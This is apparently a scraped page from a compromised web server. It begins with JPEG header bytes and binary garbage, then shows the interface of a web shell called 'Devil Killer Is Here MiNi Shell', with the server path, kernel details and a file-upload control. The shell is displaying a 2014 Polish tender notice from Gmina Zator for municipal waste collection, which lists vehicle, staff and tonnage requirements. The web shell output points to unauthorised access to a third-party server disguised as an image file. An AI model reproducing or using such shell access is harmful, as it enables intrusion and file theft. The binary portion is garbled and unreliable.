JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141017/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20141017/219653-N-2014.html

<p class="kh_header"><b>Zator: Odbieranie i zagospodarowanie (odzysk lub unieszkodliwianie) odpadów komunalnych od właścicieli nieruchomości położonych na terenie Gminy Zator w okresie od 1 kwietnia 2015 roku do 31 maja 2016 roku.</b><br>
<b>Numer ogłoszenia: 219653 - 2014; data zamieszczenia: 17.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Zatora , Plac Marszałka Józefa Piłsuskiego 1, 32-640 Zator, woj. małopolskie, tel. 33 8412215, faks 33 84 10 206.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zator.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbieranie i zagospodarowanie (odzysk lub unieszkodliwianie) odpadów komunalnych od właścicieli nieruchomości położonych na terenie Gminy Zator w okresie od 1 kwietnia 2015 roku do 31 maja 2016 roku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest odbieranie i zagospodarowanie (odzysk lub unieszkodliwianie) odpadów komunalnych od właścicieli nieruchomości położonych na terenie Gminy Zator w okresie 1 kwietnia 2015 roku do 31 maja 2016 roku. Odbiór odpadów ma się odbywać w sposób zapewniający osiągnięcie odpowiednich poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami oraz ograniczenie masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania, zgodnie z przepisami ustawy z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach (tekst jedn. Z 2013r. poz. 1399 z późn. zmianami) oraz zapisami Planu Gospodarki Odpadami dla Województwa Małopolskiego.

UWAGA ! Zamawiający zastrzega sobie prawo (zgodnie z art. 93 ust 1 pkt 7 ustawy Prawo zamówień publicznych) do unieważnienia postępowania przed terminem otwarcia ofert w sytuacji, gdy Rada Miejska w Zatorze w dniu 28.10.2014 r. nie zaakceptuje uchwałą warunków realizacji niniejszego zamówienia.

1.1. Rodzaj zamówienia - usługi.

1.2. Kod CPV : 90500000-2.

2. Zakres  przedmiotu zamówienia,  o którym  mowa w punkcie 1  obejmuje w szczególności:
a) odbieranie odpadów komunalnych (w tym segregowanych) od właścicieli nieruchomości, na których zamieszkują mieszkańcy,
- liczba mieszkańców w Gminie Zator, którzy będą objęci usługą odbierania odpadów komunalnych - wg stanu na dzień 30.09.2014r. - 8.370, w tym w budownictwie wielorodzinnym - 525 osób.
- liczba nieruchomości z zabudową jednorodzinną - 2300
- liczba nieruchomości wielorodzinnych (bloków) - 7
- powierzchnia gminy Zator - 51 km2.
b) odbieranie odpadów komunalnych od właścicieli nieruchomości, na których nie zamieszkują mieszkańcy, a powstają odpady komunalne,
- liczba nieruchomości na których nie zamieszkują mieszkańcy a powstają odpady komunalne - 170
c) transport i zagospodarowanie odpadów komunalnych zgodnie z obowiązującymi przepisami prawa.
d) zorganizowanie odbioru odpadów z remontu, odpadów wielkogabarytowych i odpadów zielonych, odpadów niebezpiecznych oraz opon w zastępstwie  prowadzenia punktu selektywnego zbierania odpadów na warunkach określonych w niniejszej SIWZ,
e) obowiązkowe prowadzenie dokumentacji w tym sprawozdawczości w zakresie i na warunkach określonych w punkcie 3.4 niniejszego rozdziału SIWZ,
f) dostawę  worków do odbierania odpadów komunalnych w asortymencie i ilości określonej w  SIWZ, na warunkach określonych w specyfikacji istotnych warunków zamówienia, dokonywanie wspólnie z Zamawiającym kontroli w terenie pojazdem Wykonawcy,
g) świadczenia w okresie trwania umowy  usług w zakresie informacji dla mieszkańców, związanej z tematyką zgodną z przedmiotem zamówienia
i) oraz wykonanie innych prac niezbędnych do należytego wykonania zamówienia,
Ilość odpadów komunalnych odebrana z terenu Gminy Zator w okresie od 01.07.2013r. do 31.08.2014r. oraz prognoza odpadów na okres objęty przetargiem

Rodzaj odpadów: Niesegregowane (zmieszanie) odpady komunalne, kod odpadów: 20 03 01, 20 03 99, odebrane w okresie 01.07.2013 - 31.08.2014r. [Mg]: 1998,58; Prognoza 01.04.2015 - 31.05.2016r. [Mg]: 2120

Rodzaj odpadów: Odpady segregowane (tworzywa sztuczne, szkło, papier, metal): Kod odpadów: 20 01 01, 20 01 02, 20 01 39, 20 01 40, odebrane w okresie 01.07.2013 - 31.08.2014r. [Mg]: 223,45; Prognoza 01.04.2015 - 31.05.2016r. [Mg]:	292

Rodzaj odpadów: Odpady ulegające biodegradacji: Kod odpadów: 20 02 01, odebrane w okresie 01.07.2013 - 31.08.2014r. [Mg]: 21,24; Prognoza 01.04.2015 - 31.05.2016r. [Mg]: 40

Rodzaj odpadów: Odpady betonu i cegły, gruz betonowy i ceglany z remontów: Kod odpadów: 17 01 01, odebrane w okresie 01.07.2013 - 31.08.2014r. [Mg]: 17; Prognoza 01.04.2015 - 31.05.2016r. [Mg]: 35

Rodzaj odpadów:  Odpady wielkogabarytowe: Kod odpadów: 20 03 07, odebrane w okresie 01.07.2013 - 31.08.2014r. [Mg]: 26,85; Prognoza 01.04.2015 - 31.05.2016r. [Mg]: 40

Rodzaj odpadów: Opony: Kod odpadów: 16 01 03, odebrane w okresie 01.07.2013 - 31.08.2014r. [Mg]: 18,40; Prognoza 01.04.2015 - 31.05.2016r. [Mg]: 25

Rodzaj odpadów: Odpady niewymienione w innych grupach: Kod odpadów: 20 03 99; odebrane w okresie 01.07.2013 - 31.08.2014r. [Mg]: 2,47; Prognoza 01.04.2015 - 31.05.2016r. [Mg]: 3

Rodzaj odpadów: Odpady niebezpieczne: Kod odpadów: 20 01 13, odebrane w okresie 01.07.2013 - 31.08.2014r. [Mg]:0; Prognoza 01.04.2015 - 31.05.2016r. [Mg]: 3

Użyte w niniejszej specyfikacji nazwy własne, znaki towarowe lub firmy producenta są przykładowe i towarzyszy im sformułowanie: lub równoważne. Mają na celu wyłącznie określenie standardu i parametrów jakościowych, użytkowych oraz funkcjonalnych. Wykonawca, który powołuje się na rozwiązania równoważne opisywane przez Zamawiającego, jest zobowiązany wykazać w treści oferty, że oferowane przez niego usługi, w tym użyte materiały, spełniają wymagania określone przez Zamawiającego, bądź przewidują zastosowanie rozwiązań lepszych od wymaganych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium - 25.000,00 zł, w jednej z form opisanych w art. 45-46 ustawy, wniesione przed terminem otwarcia ofert (oryginał dokumentu złożony przed otwarciem ofert u Skarbnika Gminy, kopia dołączona do oferty). W przypadku wpłaty gotówkowej - nr konta Zamawiającego : 
     60 8136 0000 0000 1544 2000 0170  Bank Spółdzielczy w Zatorze.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>A. Wykonawcy posiadają :
- zezwolenie na prowadzenie działalności w zakresie transportu odpadów wydane na podstawie ustawy o odpadach z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r. poz. 21),
- zaświadczenie o wpisie wykonawcy do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości na terenie Gminy Zator, prowadzonego przez Burmistrza Zatora, zgodnie z przepisami art. 9b i 9c ustawy z dnia 13 września 1996 roku o utrzymaniu czystości i porządku w gminach (tekst jedn.  Dz. U. z 2012 r., poz. 391),
 B. Wykonawcy udokumentują posiadanie aktualnego zezwolenia zintegrowanego na prowadzenie instalacji. 
Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń wymienionych w p-cie VII SIWZ, metodą  spełnia / nie spełnia.
Nie spełnienie jakiegokolwiek z wyżej wymienionych wymagań (z zastrzeżeniem art. 26 ustawy) spowoduje wykluczenie z postępowania. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>A. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą należyte wykonanie w okresie ostatnich 3 lat  przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, następujących usług:
- co najmniej jednej usługi, której przedmiotem było lub jest odbiór i przekazanie zmieszanych odpadów komunalnych od właścicieli nieruchomości, na których zamieszkują mieszkańcy oraz od właścicieli nieruchomości, na  których  nie zamieszkują   mieszkańcy,   a   powstają   odpady   komunalne   do   podmiotu uprawnionego   do   zagospodarowania   takich   odpadów,   o   łącznej   wielkości   min. 2.000 Mg,
- co najmniej jednej usługi, której przedmiotem było lub jest odbiór i przekazanie segregowanych odpadów komunalnych od właścicieli nieruchomości, na których zamieszkują mieszkańcy oraz od właścicieli nieruchomości, na  których nie   zamieszkują   mieszkańcy,  a powstają   odpady komunalne   do   podmiotu odzyskującego lub prowadzącego recykling takich odpadów, o łącznej wielkości min. 250 Mg,
B. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą należyte wykonanie w       okresie ostatnich 3 lat  przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności       jest krótszy, w tym okresie, następujących usług:
       - co   najmniej   jedna   usługa   przesortowania   niesegregowanych   (zmieszanych) odpadów         komunalnych odbieranych od właścicieli nieruchomości lub przez podmioty odbierające odpady       od       właścicieli  nieruchomości w ilości co najmniej 2.000 Mg,
      - co najmniej   jedna   usługa   zagospodarowania   odpadów   poprzez   składowanie niesegregowanych       (zmieszanych) odpadów komunalnych w ilości co najmniej 2.000 Mg.

Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń wymienionych w p-cie VII SIWZ, metodą  spełnia / nie spełnia.
Nie spełnienie jakiegokolwiek z wyżej wymienionych wymagań (z zastrzeżeniem art. 26 ustawy) spowoduje wykluczenie z postępowania. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>A.  O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują potencjałem technicznym oraz  osobami zdolnymi do wykonania zamówienia, tj.:
a) 3 specjalistycznymi pojazdami z zamkniętą skrzynią ładunkową (bezpylnych) do odbioru niesegregowanych (zmieszanych) odpadów komunalnych w tym:
- 1 pojazd wyposażony w legalizowane urządzenia do ważenia  z możliwością rejestrowania wagi odbieranych odpadów w czasie rzeczywistym,
- 1   pojazd   umożliwiający   odbiór   niesegregowanych   (zmieszanych)   odpadów komunalnych   w   miejscach   trudno   dostępnych   zabytkowych   (rejon   Starego Miasta) o DMC do 13 Mg,
- 1   pojazd   do   mycia   i   dezynfekcji   pojemników   w   systemie   zamkniętym   przy jednoczesnym   odbiorze   niesegregowanych   zmieszanych   odpadów komunalnych,
- 1 pojazdem z nadwoziem bramowym  do obsługi pojemników typu  KP, KO o poj. od 5 m 3 do 10m 3  ,
- 1  pojazdem  z  nadwoziem hakowym do obsługi   praso-kontenerów   o pojemnościach  od 10 m 3  do 36 m 3 ,
- 1 pojazdem wyposażonym w skrzynie ładunkowe  z hydraulicznym  dźwigiem samochodowym (HDS) o   łącznej minimalnej pojemności 20 m3, do odbioru odpadów segregowanych, odpadów wielkogabarytowych,   odpadów ZSEE, odpadów tzw. zielonych, w tym min. 1 z przeznaczeniem do obsługi pojemników typu dzwon,
- 1 pojazdem o dopuszczalnej masie całkowitej min. 3,5 tony - z zabudową typu izoterma   lub   inną   zabudową   umożliwiającą   odbiór   odpadów   niebezpiecznych, odpadów innych niż niebezpiecznych zgodnie z wszelkimi przepisami prawa,
- 1   samochodem   wykorzystywany   do   codziennych   objazdów   Wykonawcy   z przedstawicielem Zamawiającego, a także do załatwiania reklamacji w terenie.
b) 8 osobami, które będą uczestniczyć w wykonaniu przedmiotu zamówienia, w tym co najmniej:
- 5 kierowcami posiadającymi uprawnienia do kierowania pojazdami ciężarowymi o dopuszczalnej masie całkowitej pow. 3,5 tony,
- 1 kierowcą posiadającym uprawnienia do przewozu materiałów niebezpiecznych
- 1   osobą   posiadającą   odpowiednie wykształcenie  o   kierunku   logistycznym, mechanicznym   lub   ochrony   środowiska,   posiadającą  doświadczenie   w   zakresie  wykonania przedmiotu zamówienia.
B.  O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, tj.:
        a/ wykażą prawo do dysponowania  potencjałem technicznym w zakresie posiadania sprzętu i urządzeń technicznych niezbędnych do realizacji przedmiotu zamówienia, tj :
- a/ instalacją do mechaniczno-biologicznego przetwarzania odpadów komunalnych w skład której wchodzi m.in: linia sortownicza zmieszanych odpadów komunalnych z sitem bębnowym o oczkach 20 mm i 80 mm, 
- b/ separatorem   magnetycznym   i   przenośnikami   taśmowymi,   kabiną sortowniczą, o przepustowości co najmniej odpowiadającej ilości odpadów zamawiającego przewidzianych do zagospodarowania,
- c/ instalacją do składowania odpadów powstających w procesie mechaniczno-biologicznego   przetwarzania   zmieszanych   odpadów   komunalnych   oraz pozostałości   z   sortowania   odpadów   komunalnych   przeznaczonych   do składowania,
- d/ instalacją do kompostowania odpadów zielonych i odpadów ulegających biodegradacji, oraz frakcji   podsitowej 0-80 mm wyposażoną w bioreaktory, każdy o przepustowości co najmniej 300 Mg wraz z odpowiednim   zapleczem   do   kompostowania   w   pryzmach,   sterownią   i przepompownią ścieków,
- e/ kompaktorem - co najmniej 1szt.,
- f/ ładowarką - co najmniej 1szt.,
- g/ wagą samochodową - co najmniej 1szt.,
- h/ wózkiem widłowym - co najmniej 1szt.,
- i/ automatyczną myjką do kół i podwozi samochodowych - co najmniej 1szt.
b/ wykażą prawo do dysponowania co najmniej jedną osobą posiadającą doświadczenie w kierowaniu składowiskiem odpadów,
Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń wymienionych w p-cie VII SIWZ, metodą  spełnia / nie spełnia.
Nie spełnienie jakiegokolwiek z wyżej wymienionych wymagań (z zastrzeżeniem art. 26 ustawy) spowoduje wykluczenie z postępowania. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>A. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, tj.:
a/ 3 specjalistycznymi pojazdami z zamkniętą skrzynią ładunkową (bezpylnych) do odbioru niesegregowanych (zmieszanych) odpadów komunalnych w tym:
- 1 pojazd wyposażony w legalizowane urządzenia do ważenia  z możliwością rejestrowania wagi odbieranych odpadów w czasie rzeczywistym,
- 1   pojazd   umożliwiający   odbiór   niesegregowanych   (zmieszanych)   odpadów komunalnych   w   miejscach   trudno   dostępnych   zabytkowych   (rejon   Starego Miasta) o DMC do 13 Mg,
- 1 pojazd do mycia i dezynfekcji   pojemników   w   systemie   zamkniętym przy jednoczesnym odbiorze   niesegregowanych zmieszanych   odpadów komunalnych,
- 1 pojazdem z nadwoziem bramowym  do obsługi pojemników typu  KP, KO o poj. od 5 m 3 do 10m 3  ,
- 1  pojazdem  z  nadwoziem hakowym do obsługi   praso-kontenerów   o pojemnościach  od 10 m 3  do 36 m 3 ,
- 1 pojazdem wyposażonym w skrzynie ładunkowe  z hydraulicznym  dźwigiem samochodowym (HDS) o   łącznej minimalnej pojemności 20 m3, do odbioru odpadów segregowanych, odpadów wielkogabarytowych,   odpadów ZSEE, odpadów tzw. zielonych, w tym min. 1 z przeznaczeniem do obsługi pojemników typu dzwon,
- 1 pojazdem o dopuszczalnej masie całkowitej min. 3,5 tony - z zabudową typu izoterma   lub   inną   zabudową   umożliwiającą   odbiór   odpadów   niebezpiecznych, odpadów innych niż niebezpiecznych zgodnie z wszelkimi przepisami prawa,
- 1 samochodem wykorzystywany do codziennych objazdów Wykonawcy z przedstawicielem Zamawiającego, a także do załatwiania reklamacji w terenie.
b/ 8 osobami, które będą uczestniczyć w wykonaniu przedmiotu zamówienia, w tym co najmniej:
- 5 kierowcami posiadającymi uprawnienia do kierowania pojazdami ciężarowymi o dopuszczalnej masie całkowitej pow. 3,5 tony,
- 1 kierowcą posiadającym uprawnienia do przewozu materiałów niebezpiecznych
- 1 osobą posiadającą odpowiednie wykształcenie o kierunku logistycznym, mechanicznym lub ochrony środowiska, posiadającą  doświadczenie   w   zakresie  wykonania przedmiotu zamówienia.
B.  O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, tj.:
a/ wykażą prawo do dysponowania  potencjałem technicznym w zakresie posiadania sprzętu i urządzeń technicznych niezbędnych do realizacji przedmiotu zamówienia, tj :
- a/ instalacją do mechaniczno-biologicznego przetwarzania odpadów komunalnych w skład której wchodzi m.in: linia sortownicza zmieszanych odpadów komunalnych z sitem bębnowym o oczkach 20 mm i 80 mm, 
- b/ separatorem   magnetycznym   i   przenośnikami   taśmowymi,   kabiną sortowniczą, o przepustowości co najmniej odpowiadającej ilości odpadów zamawiającego przewidzianych do zagospodarowania,
- c/ instalacją do składowania odpadów powstających w procesie mechaniczno-biologicznego   przetwarzania   zmieszanych   odpadów   komunalnych   oraz pozostałości   z   sortowania   odpadów   komunalnych   przeznaczonych   do składowania,
- d/ instalacją do kompostowania odpadów zielonych i odpadów ulegających biodegradacji, oraz frakcji   podsitowej 0-80 mm wyposażoną w bioreaktory, każdy o przepustowości co najmniej 300 Mg wraz z odpowiednim   zapleczem   do   kompostowania   w   pryzmach,   sterownią   i przepompownią ścieków,
- e/ kompaktorem - co najmniej 1szt.,
- f/ ładowarką - co najmniej 1szt.,
- g/ wagą samochodową - co najmniej 1szt.,
- h/ wózkiem widłowym - co najmniej 1szt.,
- i/ automatyczną myjką do kół i podwozi samochodowych - co najmniej 1szt.
b/ wykażą prawo do dysponowania co najmniej jedną osobą posiadającą doświadczenie w kierowaniu  składowiskiem odpadów,

Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń wymienionych w p-cie VII SIWZ, metodą  spełnia / nie spełnia.
Nie spełnienie jakiegokolwiek z wyżej wymienionych wymagań (z zastrzeżeniem art. 26 ustawy) spowoduje wykluczenie z postępowania. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy posiadają opłaconą w dacie złożenia oferty     polisę, a w przypadku jej braku inny dokument, potwierdzający, że wykonawca jest ubezpieczony od     odpowiedzialności  cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.   
Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń wymienionych w p-cie VII SIWZ, metodą  spełnia / nie spełnia.
Nie spełnienie jakiegokolwiek z wyżej wymienionych wymagań (z zastrzeżeniem art. 26 ustawy) spowoduje wykluczenie z postępowania. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą.

Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
